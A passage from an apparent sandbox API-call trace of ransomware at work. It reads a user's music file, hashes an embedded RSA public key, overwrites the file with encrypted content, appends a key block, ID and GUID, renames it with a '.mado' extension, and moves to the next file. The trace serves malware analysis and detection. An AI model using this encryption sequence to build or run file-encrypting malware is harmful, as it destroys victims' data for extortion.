lpDistanceToMoveHigh=0x0) returned 0x0 [0204.458] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x15f97, lpOverlapped=0x0) returned 1 [0204.459] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.459] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.459] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.459] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.460] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.460] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.460] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.460] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.460] GetLastError () returned 0x0 [0204.460] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.460] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.460] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.460] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.460] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x15fa0) returned 0x3b81690 [0204.461] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80738 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe268 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80780 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe280 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6bb80 [0204.461] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe2c8 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe2b0 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68190 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b682a8 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.463] GetCurrentThreadId () returned 0x600 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71a20 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.463] GetCurrentThreadId () returned 0x600 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe298 [0204.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2b0 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68190 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b683c0 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68078 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe298 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe280 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80780 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.466] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x15f92, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x15f92, lpOverlapped=0x0) returned 1 [0204.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.467] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x15f97, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.467] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.467] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.467] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.467] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.468] CloseHandle (hObject=0x63c) returned 1 [0204.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.469] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H6AAML5ic7p-F.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h6aaml5ic7p-f.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H6AAML5ic7p-F.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h6aaml5ic7p-f.mp3.mado")) returned 1 [0204.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.470] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.471] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a215100, ftCreationTime.dwHighDateTime=0x1d5dd51, ftLastAccessTime.dwLowDateTime=0xb218d970, ftLastAccessTime.dwHighDateTime=0x1d5dcd7, ftLastWriteTime.dwLowDateTime=0xb218d970, ftLastWriteTime.dwHighDateTime=0x1d5dcd7, nFileSizeHigh=0x0, nFileSizeLow=0x10c1c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IFpoTZFb.wav", cAlternateFileName="")) returned 1 [0204.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 